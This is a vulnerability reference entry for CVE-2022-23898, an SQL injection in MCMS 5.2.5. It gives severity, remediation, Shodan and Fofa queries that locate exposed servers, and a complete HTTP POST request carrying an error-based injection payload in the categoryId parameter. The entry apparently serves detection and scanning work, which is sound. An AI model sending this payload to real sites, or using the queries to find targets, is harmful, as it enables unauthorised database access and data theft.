| Title | MCMS 5.2.5 - SQL Injection |
|---|---|
| Author | Co5mos |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. |
| Remediation | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.5. |
| CVSS Score | 9.8 |
| EPSS Score | 0.82815 |
| CVE ID | CVE-2022-23898 |
| CWE ID | CWE-89 |
| Shodan Query | http.favicon.hash:1464851260http.favicon.hash:"1464851260" |
| Fofa Query | icon_hash="1464851260" |
| Tags | cve cve2022 sqli mcms mingsoft vuln |
MCMS 5.2.5 contains a SQL injection vulnerability via the categoryId parameter in the file IContentDao.xml. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
POST /cms/content/list HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.5
Connection: close
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
categoryId=1' and updatexml(1,concat(0x7e,md5(4404),0x7e),1) and 'zzz'='zzz
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-23898.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-23898.pcap
N/AN/A